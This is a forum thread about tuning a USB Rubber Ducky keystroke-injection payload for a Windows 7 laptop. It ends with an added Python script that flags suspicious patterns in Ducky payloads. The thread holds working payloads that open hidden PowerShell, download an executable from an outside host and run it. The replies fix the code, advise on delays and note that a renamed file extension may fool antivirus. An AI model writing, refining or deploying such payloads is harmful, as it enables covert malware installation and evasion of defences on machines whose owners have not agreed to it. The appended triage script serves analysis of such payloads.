Rubber Ducky Use = Flash/Focus/License/Creation/Driver


Hello
On my W7 Ultimate laptop I plan to use the RD like a classic HID. I keep the original SD card and the original duck firmware (duck.hex). I don't need the RD to be recognized as a drive, and I'll use this script = https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute . Here are my questions for my actual situation:
1) Is it necessary to flash my SD card (to FAT32 or something else)?
2) I would like to use the script below. Is there a way to keep the focus on the hidden powershell window that is opened/keep it in the foreground (to leave time to write the code lines)?:
DELAY 10000
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process file.exe
ENTER
DELAY 100
STRING exit
ENTER
3) I saw that the RD license (for the driver) is a classic one; I read that a better one would increase the price of the RD. So do you know where I could buy this kind of "better license"? I would like this especially to not have compatibility problems and to get a very fast driver installation on the first RD connection.
4) For a laptop (W7 Ultimate) is it better to use GUI R, WINDOWS R or CONTROL ESCAPE?
5) To make my script, is it better to use?:
/ Duck Toolkit 2 = http://www.ducktoolkit.com
6) Will the driver installation on the first RD connection take something like 10 seconds, 30 seconds or more?
7) For the powershell command, is it better to use only the .exe extension or .old/.apk? What are the advantages? Does the conversion old/apk => exe work every time?
8) Does the laptop where I'll plug in the RD need Java installed or not?
Thanks in advance.
SW

1. Don't change the format of the SD card. It should come standard as FAT32 (I believe) so leave it as that. 

2. There's no way to force powershell to stay active, as you've set the windowstyle to hidden. 

3. No idea about any special drivers. 

4. Stay with GUI r as you are already using. 

5. I use the encoder from the rubber ducky github. 

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s. 

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that. 

8. No, it won't need Java when it is running as a keyboard. 


Thanks for your answers.

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.

OK. And the RD script starts after this first installation time, I guess? So I don't need to set a 15 sec delay?

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.

OK. It just renames the file, so my code above is correct? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

I'm just scared now about keeping the focus on the hidden powershell window that is opened/keeping it in the foreground.. I guess there is no solution.


On 5/18/2016 at 8:49 PM, Source_Writer said:

Thanks for your answers.

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.

OK. And the RD script starts after this first installation time, I guess? So I don't need to set a 15 sec delay?

No. The ducky starts to run as soon as it's plugged in, the only problem is that the computer won't respond to the keystrokes until after the driver has loaded. You will need a delay otherwise it'll start part way through.

On 5/18/2016 at 8:49 PM, Source_Writer said:

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.

OK. It just renames the file, so my code above is correct? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

I'm just scared now about keeping the focus on the hidden powershell window that is opened/keeping it in the foreground.. I guess there is no solution.

I'm not sure that the destination will function correctly. Variables in powershell are like $this and I don't think the web request will download the file to the correct location. You'll have to use $env:appdata instead.


Well, since all questions have been answered so far, I just want to add my experiences on some of them.

Question #5:
I usually use the GUI version of DuckyEncoder. But the other options are good as well.

Question #6:
An initial DELAY 3000 should be sufficient for more or less modern systems - even for one of my old 800MHz laptops (XP SP3).


I read some articles and arrived at this result (I didn't test it yet):

DELAY 20000
GUI r
DELAY 300
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
STRING powershell -windowstyle hidden do{sleep 5;(New-Object Net.WebClient).DownloadFile('http://site.com/file.old','%APPDATA%\file.exe')}while(!$?);&'%APPDATA%\7z1601.exe'
ENTER

What do you think about that final code?

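Added example, not code from the thread or from the Rubber Ducky project: a small Python triage script that expands a Ducky Script source such as the "final code" above into its effective keystroke stream and flags the PowerShell patterns discussed in this thread, including the cmd-style %APPDATA% literal that PowerShell leaves unexpanded (the thread's fix is $env:appdata). It assumes only the Ducky Script 1.0 commands DELAY, STRING, REM and REPEAT (REPEAT n re-runs the previous line n times); the sample payload is the one posted above, embedded as constructed test input.

```python
import re

# Constructed sample input: the "final code" posted above in this thread.
SAMPLE = """\
DELAY 20000
GUI r
DELAY 300
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
STRING powershell -windowstyle hidden do{sleep 5;(New-Object Net.WebClient).DownloadFile('http://site.com/file.old','%APPDATA%\\file.exe')}while(!$?);&'%APPDATA%\\7z1601.exe'
ENTER
"""

# Indicator name -> regex tested against everything the payload types.
INDICATORS = {
    "hidden_window": r"-windowstyle\s+hidden",
    "download": r"DownloadFile|Invoke-WebRequest",
    "execute": r"start-process|&\s*'",
    # PowerShell never expands cmd-style %VAR%; the thread's fix is $env:VAR.
    "cmd_env_in_powershell": r"%[A-Z_]+%",
}


def parse(script):
    """Expand REPEAT n (re-run the previous command n times) and return
    (commands, typed_strings, total_delay_ms)."""
    commands = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue  # blank lines and comments are ignored by the encoder
        if line.startswith("REPEAT ") and commands:
            commands.extend([commands[-1]] * int(line.split()[1]))
        else:
            commands.append(line)
    typed = [c[len("STRING "):] for c in commands if c.startswith("STRING ")]
    delay = sum(int(c.split()[1]) for c in commands if c.startswith("DELAY "))
    return commands, typed, delay


def triage(script):
    """Return the sorted indicator names that fire on the typed text."""
    typed = "\n".join(parse(script)[1])
    return sorted(k for k, rx in INDICATORS.items() if re.search(rx, typed, re.I))


if __name__ == "__main__":
    cmds, typed, delay = parse(SAMPLE)
    print(len(cmds), "keystroke commands,", delay, "ms of delay")
    print("indicators:", triage(SAMPLE))
```

Running it on the posted payload reports 109 keystroke commands (the DOWNARROW is sent 101 times), 20300 ms of total delay and all four indicators, which is the information an analyst wants when triaging an inject.bin source found on a recovered SD card.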
